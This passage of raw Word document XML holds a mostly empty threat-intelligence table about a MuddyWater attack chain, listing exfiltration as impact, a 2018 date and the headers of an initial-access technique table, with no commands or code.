              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="068A72BF" w14:textId="1F4E45D2" w:rsidR="00292FA1" w:rsidRDefault="00936DD6" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Exfiltration (confidentiality)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0860C82E" w14:textId="039EB66B" w:rsidR="00292FA1" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292FA1" w:rsidRPr="00B857D7" w14:paraId="59249079" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AA374E3" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BC7E28A" w14:textId="40EDFCA7" w:rsidR="00292FA1" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E4A72D8" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292FA1" w:rsidRPr="00B857D7" w14:paraId="54654051" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AC76126" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DE6DDEB" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CDC8EF6" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00873778" w:rsidRPr="00B857D7" w14:paraId="7FD80CA9" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A9E5D94" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1878AEF7" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68DCF60C"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2C85BC13" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E6ABB96" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FAB3DA2" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67686F61" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292FA1" w:rsidRPr="00B857D7" w14:paraId="0E27F681" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B61522B" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F9A274A" w14:textId="53F6DFA1" w:rsidR="00292FA1" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>201</w:t>
            </w:r>
            <w:r w:rsidR="009D76B8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07E242C3" w14:textId="5EB3E831" w:rsidR="00292FA1" w:rsidRDefault="001056CD" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidRPr="008C6A37">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">From January 2018 to March 2018, we observed attackers leveraging the latest code execution and persistence techniques </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>…</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292FA1" w:rsidRPr="00B857D7" w14:paraId="5EE7A587" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E28672A" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F0A87DA" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="320AAEFB" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="77C61DC8" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRPr="00AC7A85" w:rsidRDefault="00292FA1" w:rsidP="00292FA1"/>
    <w:p w14:paraId="06717786" w14:textId="1C9AFEB6" w:rsidR="00292FA1" w:rsidRDefault="00292FA1" w:rsidP="00292FA1">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Attack Technique Chain (Initial Access</w:t>
      </w:r>
      <w:r w:rsidR="001A5FC1">
        <w:t xml:space="preserve"> – Install approach one</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="440"/>
        <w:gridCol w:w="1893"/>
        <w:gridCol w:w="2430"/>
        <w:gridCol w:w="661"/>
        <w:gridCol w:w="699"/>
        <w:gridCol w:w="557"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="2164"/>
      </w:tblGrid>
      <w:tr w:rsidR="001F3C19" w:rsidRPr="002D1D50" w14:paraId="3A604C32" w14:textId="77777777" w:rsidTr="00A86605">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4A02F884" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6F04B991" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="234FD2CF" w14:textId="2D85B46A" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="117" w:name="OLE_LINK28"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>MuddyWater_001</w:t>
            </w:r>
            <w:bookmarkEnd w:id="117"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="48570EAA" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4EDA63D4" w14:textId="12CAB79A" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2B348E37" w14:textId="05F23E3B" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1A40916D" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3A17B3FA" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292FA1" w:rsidRPr="002D1D50" w14:paraId="261CF433" w14:textId="77777777" w:rsidTr="00A86605">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B57F3DB" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRPr="002D1D50" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1832DC4C" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRPr="002D1D50" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="723A0AE0" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRPr="002D1D50" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37C02737" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRPr="002D1D50" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61AD3BED" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRPr="002D1D50" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DE0CFDC" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRPr="002D1D50" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4492FFD1" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRPr="002D1D50" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="566CC70C" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRPr="002D1D50" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292FA1" w:rsidRPr="002D1D50" w14:paraId="38D7F600" w14:textId="77777777" w:rsidTr="00A86605">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FD0FE07" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRPr="002D1D50" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FAE208B" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRPr="002D1D50" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="662351B4" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRPr="002D1D50" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74026517" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRPr="002D1D50" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AED297B" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRPr="002D1D50" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="175D0C8F" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67B77841" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRPr="002D1D50" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC</w:t>
            </w:r>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="048D3932" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRPr="002D1D50" w:rsidRDefault="00292FA1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B80DF1" w:rsidRPr="00B857D7" w14:paraId="20AC1067" w14:textId="77777777" w:rsidTr="00A86605">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="790E6414" w14:textId="77777777" w:rsidR="00B80DF1" w:rsidRPr="00B857D7" w:rsidRDefault="00B80DF1" w:rsidP="00B80DF1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
